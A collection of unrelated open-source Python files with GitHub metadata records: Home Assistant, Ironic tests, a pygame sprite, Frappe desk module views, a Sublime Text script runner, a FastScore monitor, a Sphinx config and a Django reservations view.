with async_timeout.timeout(TIMEOUT):
data = await self._client.async_get_device(self._id, _FETCH_FIELDS)
self._do_update(data)
except (aiohttp.client_exceptions.ClientError, pysensibo.SensiboError):
_LOGGER.warning("Failed to connect to Sensibo servers")
self._available = False
|
{
"content_hash": "29226b7d46e9e8f9b9c3ebd7a31b9f79",
"timestamp": "",
"source": "github",
"line_count": 402,
"max_line_length": 88,
"avg_line_length": 32.039800995024876,
"alnum_prop": 0.593944099378882,
"repo_name": "adrienbrault/home-assistant",
"id": "10ceaa39a38b191283cd52cb603e2346b07a36aa",
"size": "12880",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/components/sensibo/climate.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "32021043"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
}
|
import mock
from stevedore import dispatch
from ironic.common import driver_factory
from ironic.common import exception
from ironic.tests import base
class FakeEp:
name = 'fake'
class DriverLoadTestCase(base.TestCase):
def setUp(self):
super(DriverLoadTestCase, self).setUp()
driver_factory.DriverFactory._extension_manager = None
def _fake_init_name_err(self, *args, **kwargs):
kwargs['on_load_failure_callback'](None, FakeEp, NameError('aaa'))
def _fake_init_driver_err(self, *args, **kwargs):
kwargs['on_load_failure_callback'](None, FakeEp,
exception.DriverLoadError(
driver='aaa', reason='bbb'))
def test_driver_load_error_if_driver_enabled(self):
self.config(enabled_drivers=['fake'])
with mock.patch.object(dispatch.NameDispatchExtensionManager,
'__init__', self._fake_init_driver_err):
self.assertRaises(exception.DriverLoadError,
driver_factory.DriverFactory._init_extension_manager)
def test_wrap_in_driver_load_error_if_driver_enabled(self):
self.config(enabled_drivers=['fake'])
with mock.patch.object(dispatch.NameDispatchExtensionManager,
'__init__', self._fake_init_name_err):
self.assertRaises(exception.DriverLoadError,
driver_factory.DriverFactory._init_extension_manager)
@mock.patch.object(dispatch.NameDispatchExtensionManager, 'names')
def test_no_driver_load_error_if_driver_disabled(self, mock_em):
self.config(enabled_drivers=[])
with mock.patch.object(dispatch.NameDispatchExtensionManager,
'__init__', self._fake_init_driver_err):
driver_factory.DriverFactory._init_extension_manager()
mock_em.assert_called_once_with()
|
{
"content_hash": "38ed7bf80097189cd9d61309bca12218",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 79,
"avg_line_length": 41.46808510638298,
"alnum_prop": 0.6269881990764494,
"repo_name": "rackerlabs/ironic",
"id": "9749befdf0630de13536d6fae119ac26c81b762c",
"size": "2538",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "ironic/tests/test_driver_factory.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2267329"
}
],
"symlink_target": ""
}
|
import pygame
from random import randint
import os
EXEC_DIR = os.path.dirname(__file__)
class Reward(pygame.sprite.Sprite):
""" This is the main reward class """
def __init__(self, position):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load('reward.png')
self.rect = self.image.get_rect()
self.rect.topleft = position
self.position = self.rect.topleft
self.bites = 0
self.whole_image = pygame.image.load('reward.png')
self.bite1_image = pygame.image.load('reward_bite1.png')
self.bite2_image = pygame.image.load('reward_bite2.png')
def update(self):
if self.bites == 1:
self.image = self.bite1_image
elif self.bites == 2:
self.image = self.bite2_image
elif self.bites == 3:
self.image = self.whole_image
self.rect.topleft = [randint(20, 400), randint(20, 400)]
|
{
"content_hash": "77bdee1eb3c9d1d92fd725e48329a4f7",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 68,
"avg_line_length": 34.74074074074074,
"alnum_prop": 0.6044776119402985,
"repo_name": "btnpushnmunky/cupcake",
"id": "d6074f83330e237bf7f48f154028511a2dca9657",
"size": "938",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reward.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25493"
}
],
"symlink_target": ""
}
|
from .. import ContainerAbilityInterface
from .. import QLayout
from .. import ui_extension
@ui_extension
class Layout(QLayout, ContainerAbilityInterface):
pass
|
{
"content_hash": "799e7a2eb2ccffb3c16779bdca468610",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 49,
"avg_line_length": 20.875,
"alnum_prop": 0.7844311377245509,
"repo_name": "SF-Zhou/quite",
"id": "f7a87c23ef69830cae44f78f8764b9caf91f3203",
"size": "167",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "quite/gui/widgets/layout.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "74686"
}
],
"symlink_target": ""
}
|
import frappe
import json
from frappe import _
from frappe.boot import get_allowed_pages, get_allowed_reports
from frappe.desk.doctype.desktop_icon.desktop_icon import set_hidden, clear_desktop_icons_cache
from frappe.cache_manager import build_domain_restriced_doctype_cache, build_domain_restriced_page_cache, build_table_count_cache
@frappe.whitelist()
def get(module):
"""Returns data (sections, list of reports, counts) to render module view in desk:
`/desk/#Module/[name]`."""
data = get_data(module)
out = {
"data": data
}
return out
@frappe.whitelist()
def hide_module(module):
set_hidden(module, frappe.session.user, 1)
clear_desktop_icons_cache()
def get_table_with_counts():
counts = frappe.cache().get_value("information_schema:counts")
if counts:
return counts
else:
return build_table_count_cache()
def get_data(module, build=True):
"""Get module data for the module view `desk/#Module/[name]`"""
doctype_info = get_doctype_info(module)
data = build_config_from_file(module)
if not data:
data = build_standard_config(module, doctype_info)
else:
add_custom_doctypes(data, doctype_info)
add_section(data, _("Custom Reports"), "fa fa-list-alt",
get_report_list(module))
data = combine_common_sections(data)
data = apply_permissions(data)
# set_last_modified(data)
if build:
exists_cache = get_table_with_counts()
def doctype_contains_a_record(name):
exists = exists_cache.get(name)
if not exists:
if not frappe.db.get_value('DocType', name, 'issingle'):
exists = frappe.db.count(name)
else:
exists = True
exists_cache[name] = exists
return exists
for section in data:
for item in section["items"]:
# Onboarding
# First disable based on exists of depends_on list
doctype = item.get("doctype")
dependencies = item.get("dependencies") or None
if not dependencies and doctype:
item["dependencies"] = [doctype]
dependencies = item.get("dependencies")
if dependencies:
incomplete_dependencies = [d for d in dependencies if not doctype_contains_a_record(d)]
if len(incomplete_dependencies):
item["incomplete_dependencies"] = incomplete_dependencies
if item.get("onboard"):
# Mark Spotlights for initial
if item.get("type") == "doctype":
name = item.get("name")
count = doctype_contains_a_record(name)
item["count"] = count
return data
def build_config_from_file(module):
"""Build module info from `app/config/desktop.py` files."""
data = []
module = frappe.scrub(module)
for app in frappe.get_installed_apps():
try:
data += get_config(app, module)
except ImportError:
pass
return filter_by_restrict_to_domain(data)
def filter_by_restrict_to_domain(data):
""" filter Pages and DocType depending on the Active Module(s) """
doctypes = frappe.cache().get_value("domain_restricted_doctypes") or build_domain_restriced_doctype_cache()
pages = frappe.cache().get_value("domain_restricted_pages") or build_domain_restriced_page_cache()
for d in data:
_items = []
for item in d.get("items", []):
item_type = item.get("type")
item_name = item.get("name")
if (item_name in pages) or (item_name in doctypes) or item_type == 'report':
_items.append(item)
d.update({ "items": _items })
return data
def build_standard_config(module, doctype_info):
"""Build standard module data from DocTypes."""
if not frappe.db.get_value("Module Def", module):
frappe.throw(_("Module Not Found"))
data = []
add_section(data, _("Documents"), "fa fa-star",
[d for d in doctype_info if d.document_type in ("Document", "Transaction")])
add_section(data, _("Setup"), "fa fa-cog",
[d for d in doctype_info if d.document_type in ("Master", "Setup", "")])
add_section(data, _("Standard Reports"), "fa fa-list",
get_report_list(module, is_standard="Yes"))
return data
def add_section(data, label, icon, items):
"""Adds a section to the module data."""
if not items: return
data.append({
"label": label,
"icon": icon,
"items": items
})
def add_custom_doctypes(data, doctype_info):
"""Adds Custom DocTypes to modules setup via `config/desktop.py`."""
add_section(data, _("Documents"), "fa fa-star",
[d for d in doctype_info if (d.custom and d.document_type in ("Document", "Transaction"))])
add_section(data, _("Setup"), "fa fa-cog",
[d for d in doctype_info if (d.custom and d.document_type in ("Setup", "Master", ""))])
def get_doctype_info(module):
"""Returns list of non child DocTypes for given module."""
active_domains = frappe.get_active_domains()
doctype_info = frappe.get_all("DocType", filters={
"module": module,
"istable": 0
}, or_filters={
"ifnull(restrict_to_domain, '')": "",
"restrict_to_domain": ("in", active_domains)
}, fields=["'doctype' as type", "name", "description", "document_type",
"custom", "issingle"], order_by="custom asc, document_type desc, name asc")
for d in doctype_info:
d.document_type = d.document_type or ""
d.description = _(d.description or "")
return doctype_info
def combine_common_sections(data):
"""Combine sections declared in separate apps."""
sections = []
sections_dict = {}
for each in data:
if each["label"] not in sections_dict:
sections_dict[each["label"]] = each
sections.append(each)
else:
sections_dict[each["label"]]["items"] += each["items"]
return sections
def apply_permissions(data):
default_country = frappe.db.get_default("country")
user = frappe.get_user()
user.build_permissions()
allowed_pages = get_allowed_pages()
allowed_reports = get_allowed_reports()
new_data = []
for section in data:
new_items = []
for item in (section.get("items") or []):
item = frappe._dict(item)
if item.country and item.country!=default_country:
continue
if ((item.type=="doctype" and item.name in user.can_read)
or (item.type=="page" and item.name in allowed_pages)
or (item.type=="report" and item.name in allowed_reports)
or item.type=="help"):
new_items.append(item)
if new_items:
new_section = section.copy()
new_section["items"] = new_items
new_data.append(new_section)
return new_data
def get_disabled_reports():
if not hasattr(frappe.local, "disabled_reports"):
frappe.local.disabled_reports = set(r.name for r in frappe.get_all("Report", {"disabled": 1}))
return frappe.local.disabled_reports
def get_config(app, module):
"""Load module info from `[app].config.[module]`."""
config = frappe.get_module("{app}.config.{module}".format(app=app, module=module))
config = config.get_data()
sections = [s for s in config if s.get("condition", True)]
disabled_reports = get_disabled_reports()
for section in sections:
items = []
for item in section["items"]:
if item["type"]=="report" and item["name"] in disabled_reports:
continue
# some module links might not have name
if not item.get("name"):
item["name"] = item.get("label")
if not item.get("label"):
item["label"] = _(item.get("name"))
items.append(item)
section['items'] = items
return sections
def config_exists(app, module):
try:
frappe.get_module("{app}.config.{module}".format(app=app, module=module))
return True
except ImportError:
return False
def add_setup_section(config, app, module, label, icon):
"""Add common sections to `/desk#Module/Setup`"""
try:
setup_section = get_setup_section(app, module, label, icon)
if setup_section:
config.append(setup_section)
except ImportError:
pass
def get_setup_section(app, module, label, icon):
"""Get the setup section from each module (for global Setup page)."""
config = get_config(app, module)
for section in config:
if section.get("label")==_("Setup"):
return {
"label": label,
"icon": icon,
"items": section["items"]
}
def get_onboard_items(app, module):
try:
sections = get_config(app, module)
except ImportError:
return []
onboard_items = []
fallback_items = []
if not sections:
doctype_info = get_doctype_info(module)
sections = build_standard_config(module, doctype_info)
for section in sections:
for item in section["items"]:
if item.get("onboard", 0) == 1:
onboard_items.append(item)
# in case onboard is not set
fallback_items.append(item)
if len(onboard_items) > 5:
return onboard_items
return onboard_items or fallback_items
@frappe.whitelist()
def get_links_for_module(app, module):
return [{'value': l.get('name'), 'label': l.get('label')} for l in get_links(app, module)]
def get_links(app, module):
try:
sections = get_config(app, frappe.scrub(module))
except ImportError:
return []
links = []
for section in sections:
for item in section['items']:
links.append(item)
return links
@frappe.whitelist()
def get_desktop_settings():
from frappe.config import get_modules_from_all_apps_for_user
all_modules = get_modules_from_all_apps_for_user()
home_settings = get_home_settings()
modules_by_name = {}
for m in all_modules:
modules_by_name[m['module_name']] = m
module_categories = ['Modules', 'Domains', 'Places', 'Administration']
user_modules_by_category = {}
user_saved_modules_by_category = home_settings.modules_by_category or {}
user_saved_links_by_module = home_settings.links_by_module or {}
def apply_user_saved_links(module):
module = frappe._dict(module)
all_links = get_links(module.app, module.module_name)
module_links_by_name = {}
for link in all_links:
module_links_by_name[link['name']] = link
if module.module_name in user_saved_links_by_module:
user_links = frappe.parse_json(user_saved_links_by_module[module.module_name])
module.links = [module_links_by_name[l] for l in user_links if l in module_links_by_name]
return module
for category in module_categories:
if category in user_saved_modules_by_category:
user_modules = user_saved_modules_by_category[category]
user_modules_by_category[category] = [apply_user_saved_links(modules_by_name[m]) \
for m in user_modules if modules_by_name.get(m)]
else:
user_modules_by_category[category] = [apply_user_saved_links(m) \
for m in all_modules if m.get('category') == category]
# filter out hidden modules
if home_settings.hidden_modules:
for category in user_modules_by_category:
hidden_modules = home_settings.hidden_modules or []
modules = user_modules_by_category[category]
user_modules_by_category[category] = [module for module in modules if module.module_name not in hidden_modules]
return user_modules_by_category
@frappe.whitelist()
def update_hidden_modules(category_map):
category_map = frappe.parse_json(category_map)
home_settings = get_home_settings()
saved_hidden_modules = home_settings.hidden_modules or []
for category in category_map:
config = frappe._dict(category_map[category])
saved_hidden_modules += config.removed or []
saved_hidden_modules = [d for d in saved_hidden_modules if d not in (config.added or [])]
if home_settings.get('modules_by_category') and home_settings.modules_by_category.get(category):
module_placement = [d for d in (config.added or []) if d not in home_settings.modules_by_category[category]]
home_settings.modules_by_category[category] += module_placement
home_settings.hidden_modules = saved_hidden_modules
set_home_settings(home_settings)
return get_desktop_settings()
@frappe.whitelist()
def update_global_hidden_modules(modules):
modules = frappe.parse_json(modules)
frappe.only_for('System Manager')
doc = frappe.get_doc('User', 'Administrator')
doc.set('block_modules', [])
for module in modules:
doc.append('block_modules', {
'module': module
})
doc.save(ignore_permissions=True)
return get_desktop_settings()
@frappe.whitelist()
def update_modules_order(module_category, modules):
modules = frappe.parse_json(modules)
home_settings = get_home_settings()
home_settings.modules_by_category = home_settings.modules_by_category or {}
home_settings.modules_by_category[module_category] = modules
set_home_settings(home_settings)
@frappe.whitelist()
def update_links_for_module(module_name, links):
links = frappe.parse_json(links)
home_settings = get_home_settings()
home_settings.setdefault('links_by_module', {})
home_settings['links_by_module'].setdefault(module_name, None)
home_settings['links_by_module'][module_name] = links
set_home_settings(home_settings)
return get_desktop_settings()
@frappe.whitelist()
def get_options_for_show_hide_cards():
global_options = []
if 'System Manager' in frappe.get_roles():
global_options = get_options_for_global_modules()
return {
'user_options': get_options_for_user_blocked_modules(),
'global_options': global_options
}
@frappe.whitelist()
def get_options_for_global_modules():
from frappe.config import get_modules_from_all_apps
all_modules = get_modules_from_all_apps()
blocked_modules = frappe.get_doc('User', 'Administrator').get_blocked_modules()
options = []
for module in all_modules:
module = frappe._dict(module)
options.append({
'category': module.category,
'label': module.label,
'value': module.module_name,
'checked': module.module_name not in blocked_modules
})
return options
@frappe.whitelist()
def get_options_for_user_blocked_modules():
from frappe.config import get_modules_from_all_apps_for_user
all_modules = get_modules_from_all_apps_for_user()
home_settings = get_home_settings()
hidden_modules = home_settings.hidden_modules or []
options = []
for module in all_modules:
module = frappe._dict(module)
options.append({
'category': module.category,
'label': module.label,
'value': module.module_name,
'checked': module.module_name not in hidden_modules
})
return options
def set_home_settings(home_settings):
frappe.cache().hset('home_settings', frappe.session.user, home_settings)
frappe.db.set_value('User', frappe.session.user, 'home_settings', json.dumps(home_settings))
@frappe.whitelist()
def get_home_settings():
def get_from_db():
settings = frappe.db.get_value("User", frappe.session.user, 'home_settings')
return frappe.parse_json(settings or '{}')
home_settings = frappe.cache().hget('home_settings', frappe.session.user, get_from_db)
return home_settings
def get_module_link_items_from_list(app, module, list_of_link_names):
try:
sections = get_config(app, frappe.scrub(module))
except ImportError:
return []
links = []
for section in sections:
for item in section["items"]:
if item.get("label", "") in list_of_link_names:
links.append(item)
return links
def set_last_modified(data):
for section in data:
for item in section["items"]:
if item["type"] == "doctype":
item["last_modified"] = get_last_modified(item["name"])
def get_last_modified(doctype):
def _get():
try:
last_modified = frappe.get_all(doctype, fields=["max(modified)"], as_list=True, limit_page_length=1)[0][0]
except Exception as e:
if frappe.db.is_table_missing(e):
last_modified = None
else:
raise
# hack: save as -1 so that it is cached
if last_modified is None:
last_modified = -1
return last_modified
last_modified = frappe.cache().hget("last_modified", doctype, _get)
if last_modified==-1:
last_modified = None
return last_modified
def get_report_list(module, is_standard="No"):
"""Returns list on new style reports for modules."""
reports = frappe.get_list("Report", fields=["name", "ref_doctype", "report_type"], filters=
{"is_standard": is_standard, "disabled": 0, "module": module},
order_by="name")
out = []
for r in reports:
out.append({
"type": "report",
"doctype": r.ref_doctype,
"is_query_report": 1 if r.report_type in ("Query Report", "Script Report", "Custom Report") else 0,
"label": _(r.name),
"name": r.name
})
return out
|
{
"content_hash": "985af5eb4c390a85e102d19fa9674722",
"timestamp": "",
"source": "github",
"line_count": 552,
"max_line_length": 129,
"avg_line_length": 28.628623188405797,
"alnum_prop": 0.6952477377713092,
"repo_name": "almeidapaulopt/frappe",
"id": "7a9c211c3c3d395cf3a1f8791301514b4466fe5c",
"size": "15901",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "frappe/desk/moduleview.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "67734"
},
{
"name": "HTML",
"bytes": "245760"
},
{
"name": "JavaScript",
"bytes": "2345089"
},
{
"name": "Less",
"bytes": "25489"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "3436599"
},
{
"name": "SCSS",
"bytes": "248606"
},
{
"name": "Shell",
"bytes": "3505"
},
{
"name": "Vue",
"bytes": "96912"
}
],
"symlink_target": ""
}
|
import tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Difference'] , ['PolyTrend'] , ['Seasonal_Second'] , ['LSTM'] );
|
{
"content_hash": "6a80cdc206dc7020ca2fff814dc085e9",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 87,
"avg_line_length": 40,
"alnum_prop": 0.7125,
"repo_name": "antoinecarme/pyaf",
"id": "7209b6080d9c674f6450196fa9898398f2766a79",
"size": "160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/model_control/detailed/transf_Difference/model_control_one_enabled_Difference_PolyTrend_Seasonal_Second_LSTM.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "6773299"
},
{
"name": "Procfile",
"bytes": "24"
},
{
"name": "Python",
"bytes": "54209093"
},
{
"name": "R",
"bytes": "807"
},
{
"name": "Shell",
"bytes": "3619"
}
],
"symlink_target": ""
}
|
"""
/get/client/ resource
"""
from zunzuncito import tools
class APIResource(object):
def dispatch(self, request, response):
request.log.debug(tools.log_json({
'API': request.version,
'Method': request.method,
'URI': request.URI,
'path': request.path,
'vroot': request.vroot
}, True))
return __name__
|
{
"content_hash": "27c48cccb2cdac368ba3a7e5f7399501",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 42,
"avg_line_length": 19.75,
"alnum_prop": 0.5468354430379747,
"repo_name": "nbari/zunzuncito",
"id": "1780782bcf6c00ce580dda2550edfba9dc84a960",
"size": "395",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "my_api/default/v0/zun_get/zun_client/zun_client.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "4811"
},
{
"name": "Python",
"bytes": "126204"
},
{
"name": "Shell",
"bytes": "586"
}
],
"symlink_target": ""
}
|
class IncorrectTextFieldCount(Exception):
"""Raise if there is an incorrect number of text fields in
the QuestionFormAnswer"""
def __init__(self,message):
raise self
|
{
"content_hash": "bebe8ecb8f9b852229dccd6207c43bf4",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 63,
"avg_line_length": 38,
"alnum_prop": 0.6842105263157895,
"repo_name": "tturpen/django-csaesrapp",
"id": "2d290df4efa4fd223354cd7d5ab3c94edc879ad1",
"size": "860",
"binary": false,
"copies": "1",
"ref": "refs/heads/version01",
"path": "apps/mturk/exceptions.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "5806"
},
{
"name": "Python",
"bytes": "169679"
},
{
"name": "Shell",
"bytes": "649"
}
],
"symlink_target": ""
}
|
import sublime, sublime_plugin, subprocess, threading, base64, os, tempfile
class RunScriptTestCommand(sublime_plugin.TextCommand):
def run(self, edit):
self.settings = sublime.load_settings('ScriptTestTool.sublime-settings')
script = self.get_raw_script()
sublime.set_timeout_async(lambda: self.execute_script(script), 0)
def get_raw_script(self):
region = sublime.Region(0, self.view.size())
content = self.view.substr(region)
return content
def execute_script(self, script):
temp_file = tempfile.NamedTemporaryFile(mode="w+", delete=False, encoding="utf-8")
try:
temp_file.write(script)
temp_file.close()
self.start_output()
print('ScriptTestTool: starting', self.get_proccess_args(temp_file.name))
proc = subprocess.Popen(
self.get_proccess_args(temp_file.name),
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
startupinfo = self.get_startup_info()
)
self.print_communicate(proc)
self.print_message("\n\nProcess ended, return code: {0}".format(proc.returncode))
except BaseException as err:
self.print_message("Error: {0}".format(err))
finally:
os.remove(temp_file.name)
def get_proccess_args(self, file_name):
point = self.view.sel()[0]
scope = self.view.scope_name(point.a).split()[0]
command = self.get_setting('scopes_commands').get(scope) or self.get_setting('scopes_commands').get('default')
args = self.get_setting('commands_args').get(command)
if args == None:
return
result = [file_name if item == '%file%' else item for item in args]
return result
def get_startup_info(self):
startupinfo = None
if os.name == 'nt':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
return startupinfo
def get_setting(self, name, default = None):
return self.settings.get(name, default)
def start_output(self):
self.output = sublime.active_window().create_output_panel('stt')
sublime.active_window().run_command("hide_panel", {"panel": "output.stt", "toggle": False})
sublime.active_window().run_command("show_panel", {"panel": "output.stt", "toggle": False})
def print_message(self, message):
self.output.run_command('append', {'characters': message, 'force': True, 'scroll_to_end': self.get_setting('scroll_output_to_end', True)})
def print_communicate(self, proc):
(results, errors) = proc.communicate()
if errors != b'':
output = errors
else:
output = results
output = output.decode(encoding='UTF-8')
if (self.get_setting('replace_win_eol_with_unix', True)):
output = output.replace('\r\n', '\n')
self.print_message(output)
# Слава Україні!
|
{
"content_hash": "2d0012ddf7cce91babb2930d6df6ad68",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 146,
"avg_line_length": 34.81818181818182,
"alnum_prop": 0.60411227154047,
"repo_name": "xEdelweiss/sublime-script-test-tool",
"id": "6d4e5ac6b4ed72ab883c9c511ca601bb7ef11a90",
"size": "3076",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ScriptTestTool.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3076"
}
],
"symlink_target": ""
}
|
import sys
import time
import re
from fastscore.pneumo import EngineStateMsg, EngineConfigMsg, SensorReportMsg
from fastscore.pneumo import WebSocketTimeoutException
from fastscore import Sensor
from .stable import JetStable
from .terminal import Terminal
from .layout import *
from ..colors import tcol
def monitor(connect, verbose=False, **kwargs):
engine = connect.lookup('engine')
stable = JetStable(engine)
PREINSTALLED_INTERVAL = 2.0
def draw_engine(name, state):
if state == "RUNNING":
s = name + tcol.OKGREEN + " [RUNNING]" + tcol.ENDC
else:
s = name + " [" + state + "]"
return draw(ENGINE_LAYOUT, fixed="Engine:", engine=s)
def draw_model(model):
if model == None:
s = "(not-loaded)"
else:
s = model.name + " (" + model.mtype + ")"
return draw(MODEL_LAYOUT, fixed="Model:", model=s)
def slot_text(slot):
if slot % 2 == 0:
return "I:" + str(slot)
else:
return "O:" + str(slot)
def eof_text(eof):
return "EOF" if eof else ""
def rps_text(rps, width):
return '{:{width},.0f} rps'.format(rps, width=width-4)
def mbps_text(mbps, width):
return '{:{width}.1f} mbps'.format(mbps, width=width-5)
term = Terminal(50)
l1 = draw_engine(engine.name, engine.state)
l2 = draw_model(engine.active_model)
l3 = draw(HEADER_LAYOUT, col1='Stream', col2='', col3='')
l4 = draw(HEADER_LAYOUT, col1='Jet', col2='Input', col3='Output')
term.insert('roof', "=" * term.max_width)
term.insert('engine', l1)
term.insert('model', l2)
term.insert('spacer1', "")
term.insert('header1', l3)
term.insert('delim1', "-" * term.max_width)
for slot,x in engine.active_streams.items():
l = draw(STREAM_LAYOUT, name=x.name,
slot=slot_text(slot),
eof=eof_text(x.eof),
rps='-', mbps='-')
term.insert(('stream',slot), l)
term.insert('spacer2', "")
term.insert('header2', l4)
term.insert('delim1', "-" * term.max_width)
if engine.active_model != None:
name = engine.active_model.name
for x in engine.active_model.jets:
stable.track(x.sandbox)
l = draw(JET_LAYOUT, name=engine.active_model.name,
eof=eof_text(False),
input='-', output='-')
term.insert(('jet',x.sandbox), l)
term.insert('cellar', "")
pneumo = connect.pneumo.socket()
try:
while True:
msg = pneumo.recv()
if msg.src != engine.name:
continue # multiple engines
engine.clear()
if isinstance(msg, EngineStateMsg):
l = draw_engine(msg.src, msg.state.upper())
term.update('engine', l)
if msg.state == 'init':
# engine reset
term.update('model', draw_model(None))
term.remove_by_tag('stream')
term.remove_by_tag('jet')
stable.untrackall()
elif isinstance(msg, EngineConfigMsg):
if msg.item == 'model':
l = draw_model(engine.active_model)
term.update('model', l)
elif msg.item == 'stream':
slot = msg.ref
if msg.op == 'detach':
term.remove(('stream',slot))
else:
info = engine.active_streams[slot]
l = draw(STREAM_LAYOUT, name=info.name,
slot=slot_text(slot),
eof=eof_text(info.eof),
rps='-', mbps='-')
if msg.op == 'attach':
term.insert(('stream',slot), l, 'spacer2')
elif msg.op == 'reattach':
term.update(('stream',slot), l)
elif msg.item == 'jet':
engine.clear()
sandbox = msg.ref
if msg.op == 'start':
stable.track(sandbox)
l = draw(JET_LAYOUT, name=engine.active_model.name,
eof=eof_text(False),
input='-', output='-')
term.insert(('jet',sandbox), l, 'cellar')
elif msg.op == 'stop':
term.remove(('jet',sandbox))
stable.untrack(sandbox)
elif isinstance(msg, SensorReportMsg):
m = re.match('jet\\.(\\d+)\\.(input|output)\\.records\\.count', msg.point)
if m != None:
sandbox = m.group(1)
io = m.group(2)
(pos,width) = field(io, JET_LAYOUT)
if msg.delta_time:
rps = msg.data / msg.delta_time
else:
rps = msg.data / Sensor.DEFAULT_INTERVAL
term.update(('jet',sandbox), rps_text(rps, width), pos=pos)
else:
m = re.match('manifold\\.(\\d+)\\.records\\.(count|size)', msg.point)
if m != None:
slot = int(m.group(1))
if m.group(2) == 'count':
if msg.delta_time:
rps = msg.data / msg.delta_time
else:
rps = msg.data / PREINSTALLED_INTERVAL
(pos,width) = field('rps', STREAM_LAYOUT)
term.update(('stream',slot), rps_text(rps, width), pos=pos)
else: #size
if msg.delta_time:
mbps = msg.data / msg.delta_time / 1048576.0
else:
mbps = msg.data / PREINSTALLED_INTERVAL / 1048576.0
(pos,width) = field('mbps', STREAM_LAYOUT)
term.update(('stream',slot), mbps_text(mbps, width), pos=pos)
except KeyboardInterrupt:
print
stable.untrackall()
|
{
"content_hash": "01f55e6c04a1806d62866f061f87a66e",
"timestamp": "",
"source": "github",
"line_count": 173,
"max_line_length": 90,
"avg_line_length": 37.410404624277454,
"alnum_prop": 0.4538009888751545,
"repo_name": "opendatagroup/fastscore-cli",
"id": "83e870204ba34bea052a523c3a214b917820ee33",
"size": "6473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cli/monitor/monitor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1124"
},
{
"name": "Python",
"bytes": "173186"
}
],
"symlink_target": ""
}
|
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode']
todo_include_todos = True
import sphinx
if sphinx.__version__ < '1.3':
extensions.append('sphinxcontrib.napoleon')
else:
extensions.append('sphinx.ext.napoleon')
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'Janus'
with open('../LICENSE.txt', 'r') as f:
copyright = next(f).lstrip('Copyright (c)').strip()
version = '0.0'
release = '0.0'
exclude_patterns = ['_build']
pygments_style = 'sphinx'
numfig = True
html_logo = './logo_janus-200x200.png'
html_static_path = ['_static']
htmlhelp_basename = 'janusdoc'
latex_elements = {'preamble': '',
'inputenc': '',
'fontenc': '',
'utf8extra': ''}
latex_documents = [
('index', 'janus.tex', 'Documentation of the Janus Library',
'S. Brisard', 'manual'),
]
latex_logo = './logo_janus.png'
man_pages = [
('index', 'janus', 'Documentation of the Janus Library',
['S. Brisard'], 1)
]
texinfo_documents = [
('index', 'janus', 'Documentation of the Janus Library',
'S. Brisard', 'Janus', 'One line description of project.',
'Miscellaneous'),
]
autodoc_member_order = 'groupwise'
|
{
"content_hash": "835e820d65f883b0306328b9c18c35ff",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 62,
"avg_line_length": 22.753846153846155,
"alnum_prop": 0.5949966193373901,
"repo_name": "sbrisard/janus",
"id": "bf69945e56838ac8b56f3d42e75c2becb8890965",
"size": "1724",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sphinx/conf.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5081"
},
{
"name": "C",
"bytes": "288"
},
{
"name": "Jupyter Notebook",
"bytes": "14944"
},
{
"name": "Makefile",
"bytes": "5568"
},
{
"name": "Python",
"bytes": "194513"
},
{
"name": "Shell",
"bytes": "87"
}
],
"symlink_target": ""
}
|
import datetime, simplejson
from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponseRedirect, Http404, HttpResponse
from django.template import RequestContext
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.decorators import permission_required, login_required
from schedule.models import Occurrence, Calendar
from schedule.views import get_occurrence
from django_reservations.models import EventReservations
from django_reservations.forms import RsvpForm
@login_required
def reservations(request, occurrence_id,
template_name='django_reservations/reservations.html'):
"""
Displays all RSVPs for the given occurrence.
"""
